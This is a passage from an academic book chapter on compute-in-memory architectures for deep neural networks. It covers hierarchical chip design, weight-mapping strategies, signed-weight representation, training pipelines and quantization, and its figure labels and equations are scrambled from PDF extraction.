Witt BI (1966) The functional structure of OS/360, part II: Job and task management. IBM Syst J
Wysocki RJ (2020) CPU performance scaling. In: The Linux kernel documentation. https://docs.
kernel.org/admin-guide/pm/cpufreq.html.
Zuse K (1949) Rechenmaschine zur Durchfuehrung von arithmetischen Rechenoperationen.
German Patent 975 966, 30 Jun 1949
Part IV
Emerging Computing Architectures
Compute-in-Memory Architecture
19
Hongwu Jiang, Shanshi Huang, and Shimeng Yu
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 648
DNN Basics and Corresponding CIM Principle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 650
Architecture and Algorithm Techniques for CIM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 652
Hierarchical Architecture of CIM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 652
Network Mapping Strategies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 653
Pipeline Design in CIM Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 660
Quantization Techniques in CIM Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 664
Hardware Implementations for CIM Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 667
Device Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 667
Overcoming the Non-idealities from eNVM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 671
Circuit Techniques for CIM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 672
Output Sensing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 675
Frameworks for Evaluating CIM Designs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 681
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 682
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 683
Abstract
Keywords
Introduction
In general, CIM-based approaches have two advantages: (1) improve the com-
putational efficiency of a range of different functions, such as Boolean logic
operations (e.g., AND, OR, XNOR), simple arithmetic operations (e.g., addition,
multiplication), and linear algebra operations (e.g., dot products, matrix multipli-
cation), following the benefits from FPGA-based structures (DeHon 2000); (2)
save the time and energy by reducing the amount of data transfer. The benefits
of reduced data transfer are modeled and estimated in Ronen et al. (2022). The
demonstrations of CIM have been applied to various applications, ranging from
scientific computing, digital image processing, security, and spiking neural network
(SNN) to deep learning inference/training. For instance, scientific computing such
as solving linear and partial differential equations could be implemented by CIM
to reduce the computational complexity while usually requiring a high-precision
scheme and low variability to ensure computational accuracy (Feng et al. 2021).
Besides, many digital image processing techniques such as signal filtering and
image transformation also include a large number of VMM operations, which
can be accelerated by in-memory computing (Li et al. 2018a). Moreover, CIM-
based image processing also shows potential in edge preliminary processing in
analog for fast speed and low energy consumption (Zhu et al. 2021). CIM with
device variations can be exploited to design strong physically unclonable function
for security purpose (Gao et al. 2016). Another application domain for CIM is
neuromorphic computing. For example, the conductance tuning of memory devices
could be used to imitate synapse behavior such as spike-timing-depend plasticity
(STDP) (Kim et al. 2020). Lastly, the most representative and important application
of CIM is deep learning (DL) acceleration. CIM implementation for DL could
benefit from both the efficiency of parallel computing and reduced memory access.
Hence, in this chapter, DL is chosen as an illustration application to provide a broad
overview of CIM. In the recent decade, DL algorithms, such as convolutional neural
network (CNN), have achieved remarkable success in various AI applications. The
state-of-the-art DL algorithms require a large memory capacity as the size of deep
neural networks (DNNs) increases dramatically (e.g., ViT-G/14 for ImageNet has
1843 M parameters (Simonyan and Zisserman 2015)). The acceleration of DNN is
limited by the massive fetches of the synaptic weights. Thus, from the algorithms’
point of view, a large memory capacity is preferred for reducing the expensive data
transfer from the on-chip/on-chip buffer. In the meantime, thanks to the CMOS
technology scaling and innovations on emerging nonvolatile memories (eNVMs),
on-chip memory capacity is also increasing rapidly (e.g., 256 Mb SRAM (Song
et al. 2018), 8 Mb RRAM (Kawahara et al. 2012)). Accordingly, researchers are
developing CIM architectures with on-chip embedded memories such as SRAM
(e.g., CIMAT (Jiang et al. 2020a)) and resistive random-access memory (RRAM)
(e.g., PRIME (Chi et al. 2016), PipeLayer (Song et al. 2017)).
This chapter aims to present state-of-the-art mixed-signal CIM designs from
architecture techniques such as network mapping and pipeline design to hardware
implementations, including device exploration and circuit techniques, hoping to
inspire the research community for future interdisciplinary collaborations on this
exciting research topic. Most techniques to be discussed here are proposed for
650 H. Jiang et al.
DNNs are a family of machine learning algorithms that mimic the principle of the
human brain. Generally, they are presented as a network of interconnected nodes
called neurons. The connections between neurons are called weights. Typically,
neurons are aggregated into layers: an input layer, an output layer, and one or
more hidden layers. Weights are learnable parameters controlling the strength of
the connections between neurons. Figure 1a shows a generic structure of one
layer in NN. In recent years, the remarkable success of the DL algorithms is
mainly promoted by the DNNs on image classification, which expands its power
and effectiveness across a wide range of applications such as natural language
processing and autonomous driving. DNN on image classification is taken as a
sample problem in this chapter.
The weights of a DNN are generally initialized with random numbers and learned
through training. Once the model achieved desirable performance by training, it
could be used for inference tasks. The most widely used training method for DNN
today is stochastic gradient descent (SGD). The training process mentioned in this
chapter is based on this method.
Figure 1b presents the basic diagram of the DNN training process. In general,
the process of CNN could be divided into four steps, namely, (1) inference/feed-
forward (FF), (2) error calculation (EC), (3) gradient calculation (GC), and
Layer i
Yi-1 Forward Yi
WG11
SL/BL header
11
Yi-1[0] WG1111 f
Yi[0]
δL/
δY2
δL/
δYn-1 Error
δL/
δY2
δL/
δYn-1 Error MUX
4. Weight update 3. Gradient Calculation
ADC
Ctrl
Yi-1[n] Yi[n]
Fig. 1 (a) Generic structure of one layer in DNN. (b) Basic diagram of the CNN training process.
(c) Mixed-signal MAC operation in one memory sub-array
19 Compute-in-Memory Architecture 651
(4) weight update (WU). These four steps run in a loop to obtain a well-trained
model through iterations. In the FF/inference step, the input is processed layer by
layer and finally generates the output as desired. In the classification task, the final
output is normally a distribution that indicates the class that the input belongs to.
For the inference task, this distribution will be directly used to decide the label. For
the training case, this distribution will be used to calculate a loss with respect to
the ground truth label, which indicates how far the predicted output is away from
the desired value. During the FF process for each layer, the basic operation is the
convolution between the input and weight followed by neuron activation, as shown
in Eq. 1.
Y n = f (Y n−1 ∗W n + bn ) (1)
∂L ∂L ∂Y n+1 ∂L
= = ∗W Tn+1 (2)
∂Y n ∂Y n+1 ∂Y n ∂Y n+1
∂L
Then the weight gradient ∂W n
is obtained by another convolution between the
activation and error, as shown in Eq. 3. Finally, the weights of the current layer are
updated by − ∂W∂L
n
modulated by the learning rate (LR), which is also called Wn ,
as shown in Eq. 4.
∂L ∂L ∂Y n ∂L
= = ∗Y n−1 (3)
∂W n ∂Y n ∂W n ∂Y n
∂L
W n (t) = W n (t − 1) − lr · = W n (t − 1) + W n (4)
∂W n
by the blue box, which could store binary or multi-bit weight in theory. The
multiplication is done in an analog fashion in which the input vector is loaded in
parallel as voltage to the rows and multiplied by weight conductance to generate
products in the form of current. Then current summation along columns represents
the final MAC output. Analog-to-digital converter (ADC) is normally employed
to quantize the analog MAC output to binary bits for further digital processing
(e.g., shift-and-add, activation function, and pooling). Thus the CIM is essentially
a mixed-signal computing scheme. Theoretically, VMMs could be performed in
CIM in a fully parallel fashion if assuming all the rows and all the columns can
work simultaneously. In reality, usually only a part of rows/columns could be
synchronously turned on due to limited ADC resolution or the mismatch between
the column pitch and the peripheries.
SL/BL Hearder
Pooling
Units T PE PE PE
WL Switch Matrix
Sub-
Input Encoding
R R R
Activation Array
Buffer
Units Subarray
PE PE PE
Global [2][1] [2][2] [2][3]
Control R R R
PE PE PE
Global
Buffer
Mux
[3][1] [3][2] [3][3]
Mux ADC ADC
Decoder
R R R ShiftAdd ShiftAdd
Fig. 2 Hierarchical architecture of CIM. (a) Chip-level structure composed of tiles. (b) Tile-level
structure composed of PE. (c) PE-level structure composed of sub-arrays. (d) Sub-array structure
a tile usually contains multiple in-situ processing units (PEs) and input/output
buffers connected with routers. The routers make it possible to communicate among
PEs and transfer partial sums from PEs to the top level. Figure 2c shows a PE
structure that contains one or a few CIM subarrays, local input/output buffer, and
accumulation units if necessary. The intra-PE accumulation units are normally used
to sum up partial sums from sub-arrays. Figure 2d shows a typical CIM sub-array
structure consisting of a crossbar memory array and compute peripheries including
input encoder (DACs), WL switch matrix, ADCs, shift-adders, and registers.
Especially, DACs/ADCs provide the scalability and flexibility for the mixed-signal
communication between the sub-arrays and upper level. To summarize, CIM design
is usually based on a multi-core hierarchical architecture (Jiang et al. 2020b),
in which elementary MAC operation is performed in analog domain at array
level while further processing such as activation function and accumulation is
implemented by digital.
The process of the convolutional computation is shown in Fig. 3: in layer <n>, the
size of input feature maps (IFMs, namely activations of layer <n> in the FF process)
is H × W × Cin (where H/W is the IFM plane height/width), which are the outputs
from layer <n-1>. Here, IFM and a corresponding output feature map (OFM) are
used in place of activations to denote the input/out of the convolution operation
only. The activation function is not included here, so it is not precise to call the
output activations. The size of each 3D kernel is K × K × Cin (Cin is the number
of IFMs/input filter channels) with kernel depth of Cout (i.e., there are Cout such 3D
kernels). Thus the total size of the kernels in the layer will be K × K × Cin × Cout .
To get the outputs, a group of IFMs (with size K × K × Cin ) will be selected at each
time and to be multiplied and accumulated with Cout kernels with size K × K × Cin ,
then each of them will generate a 1 × 1 × 1 output. The output from the top
kernel (shown as the light orange cube) goes to the front, and the output from the
bottom kernel (shown as the dark orange cube) goes to the back. Thus, in total, there
will be 1 × 1 × Cout outputs. As shown in Fig. 3, it could be considered that the
654 H. Jiang et al.
Layer <n>
E
IFMs OFMs
H
...
W F
Fig. 3 Computation process in a convolutional layer of DNN
kernels are “sliding over” the IFMs, and perform elementwise multiplications with
a certain stride. Then the products of each elementwise multiplication in each 3D
kernel will be summed up to get the final outputs. The size of output feature maps
(OFMs, namely outputs of layer <n>) will be E × F × Cout (E/F is the OFM plane
height/width, which depends on IFM size and stride number). Besides convolutional
layers, most CNN also has several fully connected layers, which could be viewed as
a special case of DNN with kernel size 1 × 1 × Cin × Cout , IFM size 1 × 1 × Cin ,
and IFM size 1 × 1 × Cout .
To correctly perform inference and training processes on a CIM architecture,
network mapping, especially weight mapping, is a significant part of hardware
implementation. The weight mapping strategies for the CIM architecture can be
divided into two parts: mapping methods for inference and mapping methods for
training.
... ...
K
①
IFMs
H
...
K*K*Cin
W
...
Array
① Partition
...
W ②① Cout
OFMs ①
E
②
...
F
(a) W
...
IFMs
H
IFMs
IFMs
Cin
Cin
W
... ... ... ... ... ...
...
...
+ ...
Cout sub-matrix Cout
... +
OFMs
E
...
...
Partial-sum Partial-sum
F
IFM size = W*H*Cin, Kernel size = K*K*Cin*Cout, OFM size = E*F*Cout
(b) Number of sub-matrix = K*K
waste. In a typical CNN structure, the kernel size normally varies across different
layers. Thus the unrolled weight matrix size for different layers will be quite
different, which leads to a various number of sub-arrays to be used to represent
different layers. With the kernel-flatten mapping method, it is impractical to reuse
the unrolled input data among a various number of sub-arrays since the design of
interconnects and control circuits will be complicated and non-reusable.
An alternative mapping method (Peng et al. 2020) is proposed to maximize the
input data reuse as shown in Fig. 4b, which could be named as kernel-splitting
mapping. Unlike the kernel-flatten mapping method, where all the 3D kernels are
unrolled into a large matrix, the weights at different spatial locations of each kernel
are mapped into different sub-matrices. The group (sub-matrix) of these partitioned
data is sorted according to the spatial location of partitioned data in each kernel. For
example, all the partitioned data located at the left-top channel at each kernel will
be reorganized as one group. Then it will be implemented into one sub-matrix, and
the height and width of each sub-matrix should be equal to 1 × 1 × Cin and Cout .
Hence, K × K sub-matrices are needed for all the kernels. Similarly, the size of such
a sub-matrix could also be large. In this case, each sub-matrix can be represented
by a group of sub-arrays, defined as a PE. Based on this kernel-splitting mapping
method, which cuts the kernels into several PEs according to their spatial locations
and assigns the input data into corresponding ones, it is possible to reuse the IFMs
among these PEs efficiently.
Figure 5 shows an example of kernel-splitting mapping and processing a
convolutional layer with a 3×3 kernel. Thus, nine processing units (PEs) are hired
correspondingly and each PE consists of several CIM sub-arrays. Firstly, at the first
cycle (i.e., T = 1), all the input data are assigned to the corresponding PE. For
example, an input vector with a length Cin (i.e. IFM[1][1]) is assigned to PE[1][1],
similarly IFM[1][2] is assigned to PE[1][2] and IFM[1][3] is assigned to PE[1][3].
After first-cycle computations, partial sums of size 1 × 1 × Cout from these nine PEs
will be summed up to get the final OFM. Then, at the next cycle (i.e., T = 2), the
IFMs used for the next computation are transferred to the neighboring PEs, and the
useless IFMs will be released. For example, IFM[1][2] is transferred from PE[1][2]
to PE[1][1] and IFM[1][3] is transferred from PE[1][3] to PE[1][2], while IFM[1][1]
is unloaded (will not be used anymore). As the example shows, with such novel data
flow, only one-third of input data are newly introduced from buffers, and two-thirds
of them could be reused from the neighbor PEs. Thus, by passing the used IFMs
in the same direction as the kernel slides over the inputs, the IFMs can be reused
efficiently. For general cases, with kernel size K × K, and stride equals to S, only
S/K of required input data are newly transferred in each cycle and the rest (K − S)/K
of input data can be fetched from neighboring arrays.
a0
0 b0
0 c0 d0 e0
a1 b1 c1 d1 e2
∂L/∂Yn+1
WTn+1
E
a2 b2 c2 d2 e2
F
a0
0 b
b0
0 c0
a1 b1 c1 a0 a0 a0
a2 b2 c2 Row Readout
1 a0 a0
Ă a0 a0
a0
a0
Ă
a0
a0 a0 a0 a0 a0
a0 b0 c0
a0
0 b
b0
0 c0
Ă
Ă
a1 b1 c1
a1 b1 c1
H
a2 b2 c2
a2 b2 c2
Ă
2 W
a0 a0
Ă a0 a0
∂L/∂Yn
1 2 Cout
a0
0 b
b0
0 c0
a1 b1 c1
a2 b2 c2
Cin a0
0 b
b0
0 c0 a0
0 b
b0
0 c0 Ă a0
0 b
b0
0 c0
a1 b1 c1 a1 b1 c1 a1 b1 c1
Transpose a2 b2 c2 a2 b2 c2 a2 b2 c2
1 2 Wn+1 Cout
the input means more cycles are used for one MAC. Thus, directly applying the sign
extension scheme to CIM will significantly increase the area, power consumption,
and latency cost. Instead, the MAC operations of 2’s complement values could
be done by first accumulating unsigned bit sequences and then multiplying the
signed scale. This is because the 2’s complement representation could be viewed
as the weighted sum of unsigned binary weight with signed bases (Eq. 5). Thus,
in some binary-cell-based work (Jiang et al. 2020b), the binary weight sequence is
first treated as the unsigned weighted sum in the memory array and then multiplied
back the scale and sign information (by shift-add and/or inverse function) to the 2’s
complement representation. Moreover, this representation could be extended to the
case where the memory cell is more than binary. For example, the 2’s complement
representation of the 2-bit per cell case is shown in Eq. 6. In Eq. 5, bi is binary value.
Thus, for the sum of the adjacent two values bi · 2i + bi−1 · 2i−1 , it could be viewed
as bi · 2 · 2i−1 + bi−1 · 2i−1 , which could further be grouped to (bi · 2 + bi−1 ) · 2i−1 .
The value in the bracket could be directly represented as a 2-bit value bi bi−1 as
shown in Eq. 6. In CIM array, such 2-bit value can be stored in one multi-bit cell (i.e.,
2-bit per cell in this case). It should be noticed that the most significant bit (MSB)
with the negative base could not be combined with positive bases as the other bits
(bn and bn−1 cannot be combined). A simple solution is to use one additional cell
19 Compute-in-Memory Architecture 659
to store the MSB only. Thus, if one wants to use 2-bit per cell to represent an 8-bit
weight, 5 (= 4 + 1) cells are needed. Compared to direct extending the sign bit, this
two-step calculation introduces less overhead, which is also applicable for inputs
for two reasons. First, in today’s DNN, ReLU is generally used as the activation
function, making the inputs always positive (in inference task), which means MSB
is always “0”. In this case, the MSB could be skipped. Second, for a more general
case, where negative inputs are also possible (e.g., in the EC step of training), only
an extra cycle is needed to process the MSB, which will not contribute to a big
portion of energy and latency overhead while usually multiple cycles are needed
with direct sign extension.
x = bn · −2n + bn−1 · 2n−1 + · · · b3 · 23 + b2 · 22 + b1 · 21 + b0 · 20 (5)
x = bn · −2n + bn−1 · 2n−1 + · · · b3 b2 · 22 + b1 b0 · 20 (6)
Beyond the 2’s complement representation for signed weights, there are mainly
three methods used in the reported CIM designs: (1) implement the MAC indepen-
dently with positive and negative weights; (2) implement the MAC with positive
weights and use the reference column to move them back to zero-centered weight;
(3) use a differential pair of cells per weight to represent the signed weight value.
The first method uses two copies of the weight matrix: one with positive weights
only and the other has negative weights only. Then, both the matrices are calculated
in an unsigned manner. No sign extension is needed. Then the result from the
negative arrays will be subtracted from its corresponding positive ones using pure
digital circuits. A simple illustration of this method is shown in Fig. 7a. The
disadvantage of this method is that it needs twice the hardware resources to represent
one weight matrix. Also, it is only suitable for inference implementation as the
training could make the weight change from positive to negative and vice versa.
The advantage of this method is that the two resulting matrices are sparser than the
original one, which may release the design complexity of the periphery circuits.
The second method relies on the single reference column for an array, which
is one of the most common methods used for multi-level cells and could be
applied for both training and inference. The basic idea is shown in Eq. 7. For real
implementation, the weights in the kernel are limited in a finite range. Assume
weight wi ∈ [−b, b], thus the shifted weight wi + b ∈ [0, 2b], which is always
positive. This all-positive weight matrix will be mapped to the memory array, and
then the MAC could be done with unsigned weights. A reference column will be
attached to the array to calculate the second term ini · b, as shown in Fig. 7b.
i
Since b is a constant decided by the weight range, the reference column could be
shared by the whole array. Finally, the shift back could be done in the analog domain
before ADC or by the digital circuits after ADC. The former is more difficult to
implement by circuits as the subtraction in the analog domain is not as easy as the
addition. On the other hand, the latter will introduce more errors since both terms
have quantization errors introduced by the ADC.
660 H. Jiang et al.
(a)
In1 In1 Ref column In1
Fig. 7 Weight number representation: (a) positive weight matrix + negative weight matrix;
(b) shifted weight matrix + reference column; (c) weight matrix with two differential cells
representing one weight
partial sum = ini · wi
i
= ini · [(wi + b) − b] (7)
i
= ini · (wi + b) − ini · b
i i
The last method is based on differential pair of two cells, which could be
described by Eq. 8 and Fig. 7c. Similar to the second method, the subtraction could
be done before summation in an analog manner (Liu et al. 2020) or after summation
using digital circuits based on the implementation. This method doubles the cells
needed to represent one weight. While the first method also needs double the cell
number, this method does not guarantee a similar sparsity deduction as the first one.
Compared to the second method, which has a common shared reference, this method
introduces more overhead. However, this method employs two adjacent cells in a
differential manner, and it has more flexibility to cancel the local process variations
and fine-tune the weight more precisely.
partial sum = ini · wi
i
= ini · wi+ − wi− (8)
i
= ini · wi+ − ini · wi−
i i
After mapping the network to the hardware, techniques on dataflow are usually used
to help improve the DNN acceleration in the CIM architectures. The pipeline is a
19 Compute-in-Memory Architecture 661
Intra-Layer Pipeline
As one of the representative CIM architectures, ISAAC (Shafiee et al. 2016)
attempts to improve the throughput of the architecture by using an intra-layer
pipeline, which first computes a small portion of one layer and then assigns the
partial outputs as the input for the proceeding layer in the next cycle. Figure 8
shows an example of a buffer requirement for such a pipeline, assuming that a 6 × 6
input feature map is being convolved with a 2 × 2 kernel. As shown in Fig. 8a, the
generated outputs 0, 1, 2, . . . , 6, 7 (in green) from the previous layer <n – 1> are
placed in the input buffer for layer <n>. At this moment, enough information has
been acquired to start the operations for layer <n>. So the first output for layer
<n> could be produced by stored inputs 0, 1, 6, 7 (in red box). Then, after layer
<n − 1> produces output 8, layer <n> can start to calculate the next output with input
1, 2, 7, 8 (Fig. 8b). In such a way, every new output produced by layer <n-1> triggers
the pipelining of layer <n>, which could perform kernel-based operations step-by-
step. Figure 8c shows the status of the input buffer after a few steps. At the same
time, serviced inputs (in gray) can be released from the input buffer. ISAAC’s intra-
layer pipeline enables a saving in the buffering requirements between successive
layers and a throughput improvement. However, the pooling function in DNNs could
rapidly shrink the layer size, limiting the intra-layer pipeline efficiency. Another
drawback is increasing the instant power as all the layers are expected to be active
simultaneously, which may exceed the power budget for the edge devices.
Inter-Layer Pipeline
Since CNN computations follow a layer-by-layer process, a possible inter-layer
pipeline could significantly speed up the whole process. Specifically for training,
both the FF and EC processes are executed in a layer-by-layer fashion. CIMAT
(Jiang et al. 2020a) proposes an inter-layer pipeline design, which allows the new
input to enter the pipeline every cycle within a batch. A pipeline dataflow for training
ResNet-18 is shown as an example in Fig. 9a. Since layer size varies a lot in one
network, sometimes one pipeline stage needs to include several layers to match
0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5
6 7 8 9 10 11 6 7 8 9 10 11 6 7 8 9 10 11 Not yet Received
12 13 14 15 16 17 12 13 14 15 16 17 12 13 14 15 16 17
In the Buffer
18 19 20 21 22 23 18 19 20 21 22 23 18 19 20 21 22 23
24 25 26 27 28 29 24 25 26 27 28 29 24 25 26 27 28 29 Severced & released
(a) 30 31 32 33 34 35 (b) 30 31 32 33 34 35 (c) 30 31 32 33 34 35
Backward
(Conv3) Error Calculation T2
Stage4
(Conv4) 1 2 3 4 1 2 3 4 buffer
Stage5
(Conv5) 1 2 3 1 2 3 4 5 Gradient Calculation T3
Stage6 T1_1: the 1st clock cycle 1 2 3 4 5 6
(C6-C17) inside T1
1 2 buffer
Stage7 1 : the 1st image 1 2 3 4 6 7
(Act.+ FC)
1 5 Weight update T4
128 images 128 images
(a) (b)
Fig. 9 (a) An inter-layer pipeline example inside FF and EC for ResNet-18. (b) Training process
in timeline of 7 T SRAM-based CIM architecture
the latency of each stage. In this example for ResNet-18, the latency of layer 1, 2,
3, 4, 5 to process an entire image is almost the same, approximately equal to the
total latency of the sixth to 17th convolution layers. Therefore, Layers 1, 2, . . .
5 are treated as pipeline stage 1 to stage 5, respectively, while layer 6 to layer 17
are grouped as one stage (stage 6). Stage 7 consists of a fully connected layer and
other activation function blocks. Starting from FF computation, in cycle T1_1, the
first input (i.e., first image) enters stage 1, which performs the FF computation.
At the end of T1, the outputs need to be sent to the buffer or off-chip memory
for future EC computation. Then at T1_2, the second image enters stage 1 while
the first image is passed to stage 2. In such a way, except for some initial cycles,
all the stages are occupied simultaneously in the pipeline. As described in Fig. 9,
data dependency exists in FF and EC computations. EC process can only start after
obtaining the last layer’s error outputs, indicating the FF process is completed.
The pipeline dataflow of the EC and FF processes is highly alike but in opposite
directions. Figure 9b shows the entire training process in the timeline. First, one
batch of images is fed into the CIM architecture stage by stage in the forward
direction for the FF process. After finishing the FF process of one batch (T1), the
EC process starts to operate stage by stage in the backward direction (T2). The
generated intermediate data in FF and EC process needs to be saved in buffer or
off-chip memory for gradient calculation. For the gradient calculation (GC) process,
after the errors are obtained for one batch, they are used together with the activations
to calculate the weight gradients (T3). The GC is performed after the batch FF and
EC process. Finally, weight gradients are averaged across the batch to update the
weights (T4). Pipelayer (Song et al. 2017) shows a similar inter-layer pipeline design
hiring another set of weight matrices, activating the inter-layer pipeline between the
FF and EC processes. The reason is that, with two copies of the weight matrix,
FF and EC processes can be executed simultaneously on different CIM arrays.
The drawback will be the doubled hardware cost. There is an improved CIMAT
architecture based on a novel 8 T transposable SRAM design (Jiang et al. 2020a),
19 Compute-in-Memory Architecture 663
which can perform FF and EC on the same array concurrently without employing
additional CIM arrays. The proposed 8 T SRAM bit-cell can perform bidirectional
read simultaneously (described in the section “Device Technologies”), which means
the CIM sub-array equipped with such 8 T SRAM is able to support bidirectional
MAC calculation synchronously. Thus, an aggressive inter-layer pipeline design is
proposed based on this ability, as shown in Fig. 10a. The stage configuration of the
FF and EC process is the same as the pipeline design in Fig. 9. However, instead of
waiting for the completion of the FF process, the EC process could form pipelines
together with the FF process to increase throughput significantly. In addition, as long
as the activation and error outputs of the first image are ready, the weight gradient
calculation could start to work. If the latency of the GC stage approximately equals
the latency of the FF/EC stage, gradient calculation could also work in a pipeline
fashion together with FF and BP processes. The hardware resource highly decides
the latency of the GC stage since it could be processed in parallel. Thus it could be
controlled to match the stage latency of FF/EC. The state of each stage as a function
of time is shown in Fig. 10b. For example, at T14, FF/EC stage 7 (FF/EC S7) is
performing the FF of image 8 and the EC of image 7 simultaneously. Meanwhile,
GC stage 1 (GC S1) is able to calculate the weight gradient for image6 because
necessary activations and errors of image 6 have been obtained in the T12 cycle and
the T13 cycle, respectively. Such a fully inter-layer pipeline design could further
improve the throughput of the training process with a small hardware overhead.
time
Input T1 T2 T3 T4 T14 T15
GC 5
FF/EC S1: 1 2 3 4 6 7 8 9 10 11 12 13 14/1 15/2
Stage 7
FF/EC 5
FF/EC S2: 1 2 3 4 6 7 8 9 10 11 12/1 13/2 14/3
Stage 1
GC
1 2 3 4 5 6 7 8 9 10/1 11/2 12/3 13/4
Stage 6
FF/EC S3:
FF/EC
Weight Update
GC
1 2/1 3/2 4/3 5/4 6/5 7/6 8/7 9/8
Stage 4 FF/EC S7:
FF/EC
1 2 3 4 5 6 7
Stage 4 GC S1:
GC 2 3 4 5 6
1
Stage 3 GC S2:
FF/EC 1 2 3 4 5
Stage 5 GC S3:
GC 2 3 4
1
Stage 2 GC S4: FF: feed-forward
FF/EC EC: error calculation 1 2 3
Stage 6 GC S5:
GC GC: gradient calculation
1 2
Stage 1 GC S6:
FF/EC 2/1 : FF of 2nd image & EC of 1st image 1
Stage 7 GC S7:
(a) (b)
Fig. 10 (a) Dataflow of an improved inter-layer pipeline using 8 T SRAM-based CIM architec-
ture. (b) The state of each stage as a function of time
664 H. Jiang et al.
Besides, the optimized pipeline is also beneficial to energy saving due to the reduced
off-chip memory access and standby leakage of circuits. The overhead of such
highly pipelined architecture will be the requirement of the large on-chip buffer
capacity to execute the pipeline.
In general-purpose platforms such as GPU, the training and inference for DNN
are usually run in 32-bit or 64-bit floating-point number representation. On one
side, the higher the number precision, the higher the energy will be consumed per
operation. On the other side, the floating-point number calculation usually requires
more hardware resources and consumes more power than the fixed-point number
calculation. Therefore, for the DNN accelerators, especially for edge devices,
quantized training and inference are usually utilized to minimize the chip area and
power consumption.
The quantized DNN algorithm is also an important and active research topic for
CIM architecture. Although CIM has the potential to conduct pure analog calcula-
tion, which means both input and weight could be high precision theoretically, the
fact is that the dynamic range of the outputs from the circuits/devices is limited. In
general, inputs will be limited to 1 ∼ 2 bits per cycle, while cells are limited to 1 ∼ 5
bits presentation according to the devices. High-precision inputs could be applied
to the array cycle by cycle, while high precision weights could be represented by
several cells per weight. In this case, shift-adders are essential to accumulate the
corresponding partial sums to get the final high-precision MAC outputs. Obviously,
the lower the input/weight precision, the lower the hardware cost to implement the
model with the CIM architecture. In addition, it is tough to implement floating-
point operation in CIM since the weights are saved stationary in memory, which is
difficult to realize radix points alignment. Consequently, most of the proposed CIM
architectures are designed for fixed-point operation inside the arrays. This chapter
focuses on fixed-point calculation in CIM. Recently, some CIM designs supporting
floating-point calculation were proposed (Imani et al. 2019), and the readers could
check the reference for the floating-point case if interested.
The quantization of DNN has been studied ever since the 1990s (Presley and
Haggard 1994). According to the targeted operation modes, it could be divided into
two categories: low precision inference and low precision training. The quantization
for inference aims to obtain a model that mainly includes low-precision weights
and activations in the inference stage. Without specific techniques applied, directly
quantizing the weights and activations of a well-trained floating-point model to 8-
bit fixed-point inference is usually possible to have negligible performance loss for
most image classification tasks (Vanhoucke et al. 2011). Low precision training
targets reducing energy costs and required resources for training/quantization.
It is much more challenging to guarantee comparable performance with the floating-
point network with low-precision training. As the weights need to be updated
during training, which may cause large dynamic range changes for both weights
and activations, using a low precision fixed-point number representation across all
19 Compute-in-Memory Architecture 665
the training processes is risky. The safer choice is to use at least 16-bit floating-point
numbers for low-precision training, especially for those complex datasets requiring
training from scratch.
Several popular quantization techniques that are widely used in CIM architec-
tures will be briefly introduced, which are: (a) dynamic fixed-point quantization;
(b) mix-precision weight; (c) stochastic quantization. More aggressive quantization
algorithms that are not applicable to CIM are not covered in detail in this chapter.
The dynamic fixed point quantization (Courbariaux et al. 2015) is proposed as
a compromise between fixed-point and floating-point for training tested on MNIST
and CIFAR-10 datasets and successfully reduced the precision to 10 bits for FF
and EC. The dynamic fixed-point will have a scaler parameter to scale a fixed-
point number as the exponential part of the floating-point number called the shared
exponent. This shared exponent will change during training while making the MAC
operation stay in low fixed-point precision. For example, the shared exponents could
be the moving average of the maximum value of the numbers participating in MAC.
A DNN model could have several shared exponents for groups of numbers, such as
one per layer or one per channel. The original paper only explores its effectiveness
on moderate tasks such as CIFAR-10 classification, but this concept is widely used
in the following proposed quantization algorithms.
The mix-precision weight is another technique used in Courbariaux et al. (2015)
and many other quantization algorithms based on the observation that weights used
in FF and EC could be in lower precision than in WU (for gradient accumulation).
Thus during training, a copy of high-precision weights will be stored in memory.
For the FF and EC, this copy will be quantized to lower precision for economic
convolution calculation. After the weight gradients are calculated, they are used to
update the high precision weights version instead of the quantized version for FF
and EC calculation.
Stochastic quantization is introduced in Hubara et al. (2016) for gradient
quantization to avoid the underflow of small gradients. In stochastic quantization,
the gradient is used as a probability to round to its nearest quantized levels.
Compared to deterministic quantization, nonzero probabilities are assigned even
to very small gradients. Stochastic quantization could make the gradients effective
even with lower precision, which means the weight used in the weight update could
be held in lower precision.
Quantization techniques (a) and (b) are widely used to train a quantized model for
inference-only mode. For the dynamic fixed-point value, the shared exponents are
fixed during the inference stage once the training is done. Thus the model could be
mapped to the hardware using the fixed-point format. Since the training overhead is
not considered, the high precision copy of the weight could be implemented even in
floating-point, which means the gradient could be floating-point. Also, since EC is
not a part of inference, errors could be implemented in high precision floating-point
to reduce the noise caused by quantization during training. Compared to quantizing
the floating-point model directly after training, these quantization-aware training
techniques could achieve lower precision inference for similar accuracy on the same
model structure.
666 H. Jiang et al.
During the training, all three techniques are important to keep the overall on-chip
hardware overhead small. Activation, weight, and error are all in dynamic fixed-
point format to support low precision fixed-point MAC for both FF and EC. Weight
precision is low due to the mixed precision, which will benefit FF and EC since it
takes part in both. Stochastic quantization is important to keep the gradient at low
precision, thus decreasing the required weight precision during weight update.
Some modern quantization algorithms achieve extreme quantization with one
